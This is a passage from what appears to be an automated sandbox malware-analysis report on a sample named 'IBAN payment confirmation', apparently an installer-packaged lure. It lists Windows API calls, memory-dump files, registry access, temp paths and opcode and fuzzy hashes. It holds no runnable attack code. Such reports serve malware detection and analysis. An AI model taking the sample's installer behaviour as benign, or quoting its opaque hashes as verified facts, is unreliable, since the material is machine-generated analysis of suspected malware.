                                                                                                                                • Part of subcall function 00405194: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524F
                                                                                                                              • CreateDialogParamW.USER32(0000006F,00000000,00402C7F,00000000), ref: 00402DA5
                                                                                                                              • ShowWindow.USER32(00000000,00000005), ref: 00402DB3
                                                                                                                                • Part of subcall function 00402CFE: MulDiv.KERNEL32(00026667,00000064,0002B198), ref: 00402D13
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1942118512.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.1942104417.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942133333.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                                                              • String ID: ... %d%%
                                                                                                                              • API String ID: 722711167-2449383134
                                                                                                                              • Opcode ID: 37da5e6e22464c23d40ec4d31b3b8eabf55409bf9acffd0f2ef74a8860773cf4
                                                                                                                              • Instruction ID: 10fb19a6c4b2eae8d62923eb178f02f9fc5b3c6af7becd3ce095817841e91703
                                                                                                                              • Opcode Fuzzy Hash: 37da5e6e22464c23d40ec4d31b3b8eabf55409bf9acffd0f2ef74a8860773cf4
                                                                                                                              • Instruction Fuzzy Hash: 2901A130949220EBD7626B60AF1DAEA3B68EF01704F1445BBF901B11E0C6FC9D01CA9E
                                                                                                                              APIs
                                                                                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A79
                                                                                                                              • GetMessagePos.USER32 ref: 00404A81
                                                                                                                              • ScreenToClient.USER32(?,?), ref: 00404A9B
                                                                                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404AAD
                                                                                                                              • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404AD3
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1942118512.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.1942104417.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942133333.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Message$Send$ClientScreen
                                                                                                                              • String ID: f
                                                                                                                              • API String ID: 41195575-1993550816
                                                                                                                              • Opcode ID: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                                                                                                              • Instruction ID: cab112d5f89b67c13374b27971796476edbf79a01bfb7ffc6895eaaae0ed81f2
                                                                                                                              • Opcode Fuzzy Hash: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                                                                                                              • Instruction Fuzzy Hash: 1C014C71E40219BADB00DB94DD85BFEBBB8AB55715F10012ABB11B61C0C7B4A9018BA5
                                                                                                                              APIs
                                                                                                                              • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C9D
                                                                                                                              • wsprintfW.USER32 ref: 00402CD1
                                                                                                                              • SetWindowTextW.USER32(?,?), ref: 00402CE1
                                                                                                                              • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402CF3
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1942118512.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.1942104417.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942133333.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                              • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                                                              • API String ID: 1451636040-1158693248
                                                                                                                              • Opcode ID: 51bd416a2a5802dcebde0e8cf043a9bf389b7035035a475ca1d7752134760d3a
                                                                                                                              • Instruction ID: 78b67de6d16717a489960d5e53e23e1f77e1f7f38f635152e8b2699b13fa448d
                                                                                                                              • Opcode Fuzzy Hash: 51bd416a2a5802dcebde0e8cf043a9bf389b7035035a475ca1d7752134760d3a
                                                                                                                              • Instruction Fuzzy Hash: EAF06270504108ABEF205F50CD4ABAE3768BB00309F00803AFA16B91D0CBF95959DF59
                                                                                                                              APIs
                                                                                                                              • wsprintfW.USER32 ref: 100024E1
                                                                                                                              • StringFromGUID2.OLE32(?,00000000,?,?,?,00000000,00000001,1000186C,00000000), ref: 100024F5
                                                                                                                                • Part of subcall function 100012F3: lstrcpyW.KERNEL32(00000019,00000000,771AFFC0,100011AA,?,00000000), ref: 1000131E
                                                                                                                              • GlobalFree.KERNEL32(?), ref: 10002559
                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 10002582
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1955740112.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.1955670729.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1955830889.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1955921061.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: FreeGlobal$FromStringlstrcpywsprintf
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2435812281-0
                                                                                                                              • Opcode ID: 9253aae3ae820304c48da97b40e54ff33b64d0bdf23cd0f03cf5d4ae08895b6f
                                                                                                                              • Instruction ID: b8df5bf25714b619238b14e922296a4c8fadfdd3343c634a81266bb1cff10f5b
                                                                                                                              • Opcode Fuzzy Hash: 9253aae3ae820304c48da97b40e54ff33b64d0bdf23cd0f03cf5d4ae08895b6f
                                                                                                                              • Instruction Fuzzy Hash: 3131F1B1504A1AEFFB21CFA4DCA482AB7B8FF003D67224519F9419217CDB319D50DB69
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 10001243: lstrcpyW.KERNEL32(00000000,?,?,?,10001534,?,10001020,10001019,00000001), ref: 10001260
                                                                                                                                • Part of subcall function 10001243: GlobalFree.KERNEL32 ref: 10001271
                                                                                                                              • GlobalFree.KERNEL32(?), ref: 10001928
                                                                                                                              • GlobalFree.KERNEL32(?), ref: 10001AB9
                                                                                                                              • GlobalFree.KERNEL32(?), ref: 10001ABE
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1955740112.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.1955670729.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1955830889.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1955921061.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: FreeGlobal$lstrcpy
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 176019282-0
                                                                                                                              • Opcode ID: 1c9453be25982cee2ee6e6730667b579ec96db4d4f6aa0d6ab14657c31cbc0ef
                                                                                                                              • Instruction ID: 5f977143e903dceeb219282147683d12af406f102b63ffa8563e92424d473d54
                                                                                                                              • Opcode Fuzzy Hash: 1c9453be25982cee2ee6e6730667b579ec96db4d4f6aa0d6ab14657c31cbc0ef
                                                                                                                              • Instruction Fuzzy Hash: B451B736F01119DAFF10DFA488815EDB7F5FB463D0B228169E804A311CDB75AF419B92
                                                                                                                              APIs
                                                                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402B9B
                                                                                                                              • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402BD7
                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00402BE0
                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00402C05
                                                                                                                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402C23
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1942118512.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.1942104417.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942133333.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Close$DeleteEnumOpen
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1912718029-0
                                                                                                                              • Opcode ID: 91a0cc9b62795f3a8a15dda2708214bc4454f5c9052d466bcbd9eea0ad329b5b
                                                                                                                              • Instruction ID: ada95b61e8ad34ac3bb2ad29be3e5f3f7733698153a8948b25f67961a2a4c07b
                                                                                                                              • Opcode Fuzzy Hash: 91a0cc9b62795f3a8a15dda2708214bc4454f5c9052d466bcbd9eea0ad329b5b
                                                                                                                              • Instruction Fuzzy Hash: 2E113D7190400CFEEF21AF90DE89DAE3B79EB54348F10447AFA05B10A0D3759E51EA69
                                                                                                                              APIs
                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002167,?,00000808), ref: 1000162F
                                                                                                                              • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,10002167,?,00000808), ref: 10001636
                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002167,?,00000808), ref: 1000164A
                                                                                                                              • GetProcAddress.KERNEL32(10002167,00000000), ref: 10001651
                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 1000165A
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1955740112.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.1955670729.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1955830889.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1955921061.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1148316912-0
                                                                                                                              • Opcode ID: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                                                                                              • Instruction ID: 7647a3e7d8fb005f6fbf822ef0874fdc4783f8eaf5d0662476f5196d1f8db515
                                                                                                                              • Opcode Fuzzy Hash: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                                                                                              • Instruction Fuzzy Hash: 7CF098722071387BE62117A78C8CD9BBF9CDF8B2F5B114215F628921A4C6619D019BF1
                                                                                                                              APIs
                                                                                                                              • GetDlgItem.USER32(?,?), ref: 00401CEB
                                                                                                                              • GetClientRect.USER32(00000000,?), ref: 00401CF8
                                                                                                                              • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D19
                                                                                                                              • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D27
                                                                                                                              • DeleteObject.GDI32(00000000), ref: 00401D36
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1942118512.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.1942104417.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942133333.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1849352358-0
                                                                                                                              • Opcode ID: 489282a1a85ab549aaf4814a5337f0dda84e369b99e1904d90d03a31c2257fb7
                                                                                                                              • Instruction ID: 62a37a396924b9b833916b179176740e0848b2f5cedec3081aefe4e9105dc113
                                                                                                                              • Opcode Fuzzy Hash: 489282a1a85ab549aaf4814a5337f0dda84e369b99e1904d90d03a31c2257fb7
                                                                                                                              • Instruction Fuzzy Hash: F0F0E1B2A04104BFDB01DBE4EE88DEEB7BCEB08305B104466F601F5190C674AD018B35
                                                                                                                              APIs
                                                                                                                              • GetDC.USER32(?), ref: 00401D44
                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D51
                                                                                                                              • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D60
                                                                                                                              • ReleaseDC.USER32(?,00000000), ref: 00401D71
                                                                                                                              • CreateFontIndirectW.GDI32(0040BD88), ref: 00401DBC
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1942118512.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.1942104417.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942133333.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3808545654-0
                                                                                                                              • Opcode ID: 2e0cf1ae7789b1e5f567ac3b49d0821904878b54da257bbf53db2f94e685cd66
                                                                                                                              • Instruction ID: 3b80acf522b7bf2f021413e8febbbf72b8f641a50adb0d53ac9f1aa9edf06097
                                                                                                                              • Opcode Fuzzy Hash: 2e0cf1ae7789b1e5f567ac3b49d0821904878b54da257bbf53db2f94e685cd66
                                                                                                                              • Instruction Fuzzy Hash: DF01D131948280AFEB016BB0AE0BB9ABF74DF95301F144479F245B62E2C77914049F7E
                                                                                                                              APIs
                                                                                                                              • lstrlenW.KERNEL32(004226D0,004226D0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,0000040F,00000400,00000000), ref: 00404A09
                                                                                                                              • wsprintfW.USER32 ref: 00404A12
                                                                                                                              • SetDlgItemTextW.USER32(?,004226D0), ref: 00404A25
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1942118512.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.1942104417.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942133333.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ItemTextlstrlenwsprintf
                                                                                                                              • String ID: %u.%u%s%s
                                                                                                                              • API String ID: 3540041739-3551169577
                                                                                                                              • Opcode ID: 5ac319f3f1fbe76218499090b5c3f3a2c47b89264d6babd6022050aef882dcc8
                                                                                                                              • Instruction ID: 6b2e2e184c3c611d12d6b53aa9198873543b26f6782fca7c8cbe4a2e3a07221a
                                                                                                                              • Opcode Fuzzy Hash: 5ac319f3f1fbe76218499090b5c3f3a2c47b89264d6babd6022050aef882dcc8
                                                                                                                              • Instruction Fuzzy Hash: 1411E2736001243BCB10A66D9C45EEF368D9BC6334F180637FA29F61D1DA799C2186EC
                                                                                                                              APIs
                                                                                                                              • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                                                                                                              • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C42
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1942118512.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.1942104417.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942133333.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend$Timeout
                                                                                                                              • String ID: !
                                                                                                                              • API String ID: 1777923405-2657877971
                                                                                                                              • Opcode ID: 5e1f230eecded0db815b532ef795033685ed3b5cfc855201c3a552c7fdd4c815
                                                                                                                              • Instruction ID: 3450dd174e4bd499bd5dd80d9ee349d4783428bbf063aee010979b0fef1ae38f
                                                                                                                              • Opcode Fuzzy Hash: 5e1f230eecded0db815b532ef795033685ed3b5cfc855201c3a552c7fdd4c815
                                                                                                                              • Instruction Fuzzy Hash: D8217471A44109BEEF019FB0C94AFAD7B75EF44748F20413AF502B61D1D6B8A941DB18
                                                                                                                              APIs
                                                                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,00000002,Call,?,0040602A,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405DE1
                                                                                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?,?,0040602A,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405E02
                                                                                                                              • RegCloseKey.ADVAPI32(?,?,0040602A,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405E25
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1942118512.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.1942104417.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942133333.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CloseOpenQueryValue
                                                                                                                              • String ID: Call
                                                                                                                              • API String ID: 3677997916-1824292864
                                                                                                                              • Opcode ID: 6d49e1ec12a7b24cc87819d5cf70687d25a5c21dfc25d1df192b84af38ef9460
                                                                                                                              • Instruction ID: 2fd967afc3cf920b801d0ff69ba4d64ac6492d281fb7c7a5729fe10eb95daac3
                                                                                                                              • Opcode Fuzzy Hash: 6d49e1ec12a7b24cc87819d5cf70687d25a5c21dfc25d1df192b84af38ef9460
                                                                                                                              • Instruction Fuzzy Hash: F4011A3255020AEADB219F56ED09EDB3BACEF85350F00403AF945D6260D335EA64DBF9
                                                                                                                              APIs
                                                                                                                              • lstrlenW.KERNEL32(?,C:\Users\user~1\AppData\Local\Temp\,00403344,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,771B3420,00403512), ref: 0040593B
                                                                                                                              • CharPrevW.USER32(?,00000000,?,C:\Users\user~1\AppData\Local\Temp\,00403344,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,771B3420,00403512), ref: 00405945
                                                                                                                              • lstrcatW.KERNEL32(?,00409014), ref: 00405957
                                                                                                                              Strings
                                                                                                                              • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405935
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1942118512.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
